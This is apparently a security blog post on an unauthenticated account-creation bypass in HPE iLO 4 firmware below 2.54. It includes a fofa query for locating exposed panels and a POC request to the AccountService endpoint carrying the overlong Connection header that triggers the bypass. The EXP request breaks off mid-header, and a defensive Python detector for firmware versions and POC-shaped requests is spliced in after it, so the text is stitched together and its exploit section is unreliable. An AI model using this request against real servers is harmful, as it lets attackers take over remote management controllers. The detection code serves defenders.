Principle
Unauthorized access: the add-user operation never verifies the identity of the caller, so an unauthenticated user can add accounts.

Affected versions
iLO 4 firmware: 2.xx releases below 2.54.

Impact
Full access to the web panel can be obtained; the host can then be controlled through HPE iLO's built-in remote-control software. Download address: https://support.hpe.com/hpsc/swd/public/detail?swItemId=MTX_4f842ceb31cf48d392e22705a8

POC & EXP
fofa: title="iLO"

Manual
# POC
GET /rest/v1/AccountService/Accounts HTTP/1.1
Host: x.x.x.x:x
Content-Length: 273
Accept-Encoding: gzip, deflate
Accept: */*
Connection: AAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Content-Type: application/json

# EXP
POST /rest/v1/AccountService/Accounts HTTP/1.1
Host: x.x.x.x:x
C
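As an added example (not from the original post), here is a small Python helper written from the defender's side: it classifies a reported iLO 4 firmware version against the affected range named above, and scans captured HTTP request heads (from a reverse proxy or packet capture) for the request shape shown in the POC, namely an unauthenticated call to the AccountService endpoint carrying a Connection header that is not a valid connection token. The sample requests, the address 192.0.2.10, the length thresholds, and the assumption that legitimate iLO REST clients send an Authorization or X-Auth-Token header are constructed for this example.

```python
"""Detection helpers for the iLO 4 REST account-creation bypass described above.

Constructed example, not code from the original post. Two pieces a defender needs:
(1) is a reported firmware version in the affected range (2.xx below 2.54), and
(2) does a captured request head match the POC fingerprint (unauthenticated
request to the AccountService endpoint with a bogus Connection header value).
"""
import re
from typing import Dict, List, Optional, Tuple

ACCOUNTS_PATH = "/rest/v1/AccountService/Accounts"  # endpoint from the POC on the page
FIXED_VERSION = (2, 54)                               # first fixed 2.xx release per the post

# Legitimate Connection tokens (case-insensitive). Anything else is treated as suspect.
KNOWN_CONNECTION_TOKENS = {"keep-alive", "close", "upgrade", "te"}


def parse_version(version: str) -> Optional[Tuple[int, int]]:
    """Parse a 'major.minor' string such as '2.53'; return None if it does not parse."""
    m = re.fullmatch(r"\s*(\d+)\.(\d+)\s*", version)
    if not m:
        return None
    return int(m.group(1)), int(m.group(2))


def is_affected(version: str) -> bool:
    """True when the version is a 2.xx release below 2.54 (the range the post names)."""
    parsed = parse_version(version)
    if parsed is None:
        return False
    major, minor = parsed
    return major == 2 and (major, minor) < FIXED_VERSION


def parse_request(raw: str) -> Dict[str, object]:
    """Split a raw HTTP request head into method, path and a lower-cased header dict."""
    lines = raw.strip().splitlines()
    method, path, _version = lines[0].split(" ", 2)
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        if ":" not in line:
            continue
        name, value = line.split(":", 1)
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "path": path, "headers": headers}


def suspicious_connection_value(value: str) -> bool:
    """Connection must be a comma-separated list of tokens. Flag a run of one repeated
    character (the POC shape) or any token that is neither a known option nor a
    plausible hop-by-hop header name (heuristic thresholds, chosen for this example)."""
    tokens = [t.strip().lower() for t in value.split(",") if t.strip()]
    for tok in tokens:
        if tok in KNOWN_CONNECTION_TOKENS:
            continue
        if len(set(tok)) == 1 and len(tok) >= 8:
            return True
        if len(tok) > 24 or not re.fullmatch(r"[a-z0-9!#$%&'*+.^_`|~-]+", tok):
            return True
    return False


def check_request(raw: str) -> List[str]:
    """Return findings for one raw request head; an empty list means nothing was seen."""
    req = parse_request(raw)
    headers: Dict[str, str] = req["headers"]  # type: ignore[assignment]
    findings: List[str] = []
    conn = headers.get("connection", "")
    if conn and suspicious_connection_value(conn):
        findings.append(f"malformed Connection header ({len(conn)} chars)")
    if str(req["path"]).startswith(ACCOUNTS_PATH):
        if req["method"] == "POST":
            findings.append("account creation attempt on AccountService")
        # Assumption: legitimate REST clients authenticate with basic auth or a session token.
        if "authorization" not in headers and "x-auth-token" not in headers:
            findings.append("AccountService request without credentials")
    return findings


# Constructed samples: the first mirrors the header shape of the POC on the page,
# the second is an ordinary authenticated request that should yield no findings.
SAMPLE_POC = """GET /rest/v1/AccountService/Accounts HTTP/1.1
Host: 192.0.2.10:443
Accept: */*
Connection: AAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Content-Type: application/json
"""

SAMPLE_BENIGN = """GET /rest/v1/AccountService/Accounts HTTP/1.1
Host: 192.0.2.10:443
Authorization: Basic ZXhhbXBsZTpleGFtcGxl
Connection: keep-alive
"""

if __name__ == "__main__":
    for label, sample in (("poc-shaped", SAMPLE_POC), ("benign", SAMPLE_BENIGN)):
        print(label, check_request(sample) or "no findings")
    print("2.53 affected:", is_affected("2.53"), "| 2.54 affected:", is_affected("2.54"))
```

The version check is what an inventory script should run against the firmware string each iLO reports; the request check is meant to sit on a proxy or IDS log in front of the management network, where a Connection header made of one repeated character has no legitimate reason to appear.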
Equinox
A cybersecurity person who enjoys sharing